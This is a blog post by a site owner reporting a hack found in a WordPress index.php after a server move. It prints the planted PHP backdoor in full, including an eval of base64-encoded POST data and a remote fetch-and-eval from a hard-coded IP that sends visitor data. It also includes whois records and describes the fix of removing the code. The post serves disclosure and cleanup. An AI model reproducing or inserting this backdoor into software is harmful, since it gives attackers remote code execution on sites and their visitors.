NASTY CODE hacks onto your domain. FIX included.

I’ve just finished moving my site to a new server, so I started running checks… Google Webmaster Tools, Error document handling, SERPs… then I discovered Google’s index of my site has pages that are not existent on my site… and the scary thing is when these pages are clicked, they are redirected to an IP address based site.

I was scared, how can that be, that these pages are redirecting to an external site… Upon digging and sniffing for a clue, I stumbled apon this line of code on index.php

<?php //@WPEUpdate 2.12.76
// Do Not Delete!
//
// This is wordpress autoupdate code.
//
// (c) WordPress. Codeart.
//
/*	if (isset($_POST['wp_ping'])) eval(base64_decode($_POST['wp_ping']));
	@include('/tmp/wp_filter/code');
	if (isset($_GET['p']) && (!is_numeric($_GET['p']) || $_GET['p'] > 50000)) eval(file_get_contents(base64_decode('aHR0cDovLzIwMi43NS4zNS4xOTgv=').'/cp.php?host='.urlencode($_SERVER['HTTP_HOST']).'&p='.$_GET['p'].'&ref='.urlencode($_SERVER['HTTP_REFERER']).'&ua='.urlencode($_SERVER['HTTP_USER_AGENT'])."&uri=".urlencode($_SERVER['REQUEST_URI'])."&ip=".urlencode($_SERVER['REMOTE_ADDR'])));
//@?> <?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>

the part below is the hack code that was planted somehow somewhere (not sure if on my new server or on the old server)

/*	if (isset($_POST['wp_ping'])) eval(base64_decode($_POST['wp_ping']));
	@include('/tmp/wp_filter/code');
	if (isset($_GET['p']) && (!is_numeric($_GET['p']) || $_GET['p'] > 50000)) eval(file_get_contents(base64_decode('aHR0cDovLzIwMi43NS4zNS4xOTgv=').'/cp.php?host='.urlencode($_SERVER['HTTP_HOST']).'&p='.$_GET['p'].'&ref='.urlencode($_SERVER['HTTP_REFERER']).'&ua='.urlencode($_SERVER['HTTP_USER_AGENT'])."&uri=".urlencode($_SERVER['REQUEST_URI'])."&ip=".urlencode($_SERVER['REMOTE_ADDR'])));

WHICH translates to this header directive…

<br />
<b>Warning</b>:  file_get_contents(https://202.75.35.198//cp.php?host=www.any-domain-here.com&amp;p=437682&amp;ref=&amp;ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29&amp;uri=%2F%3Fp%3D437682&amp;ip=66.249.71.215) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed!  in <b>/home/any-domain-here/public_html/index.php</b> on line <b>10</b><br />

`

NASTY! UNTIL I removed the above code on my site’s index.php, all pages were being redirected to the malicious and rogue IP-based site ( 202.75.35.198 )…

IP Information for 202.75.35.198
IP Location: Malaysia Malaysia Telekom Malaysia Berhad
IP Address: 202.75.35.198 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
SSL Cert: 2007-01-24 SSL Certificate has expired.
Reverse IP: 1 other sites hosted on this server.
Blacklist Status: Clear
Whois Record

inetnum: 202.75.32.0 – 202.75.63.255
netname: TMIDC-MY
descr: TELEKOM MALAYSIA BERHAD,
descr: HOSTING SERVICES, DSD,
descr: MYLOCA, INTERNET DATA CENTRE.
country: MY
admin-c: AA125-AP
tech-c: MS283-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-MY-EASTGATE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation’s account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: 20050715
source: APNIC

person: Azman Ali
address: 20th Floor, Wisma Celcom Semarak
address: Jalan Raja Muda Abdul Aziz
address: 50400 Kuala Lumpur
country: MY
phone: +603-26812075
fax-no: +603-26810186
e-mail:
nic-hdl: AA125-AP
mnt-by: MAINT-MY-EASTGATE
changed: 20050202
source: APNIC

person: mohd Ghazali Sabri
address: 3rd Floor, TM IT Complex
address: 3300 Lingkaran Usahawan 1 Timur
address: 63000 Cyber Jaya Selangor
country: MY
phone: +603-83180322
fax-no: +603-83188061
e-mail:
nic-hdl: MS283-AP
mnt-by: MAINT-MY-EASTGATE
changed: 20011126
source: APNIC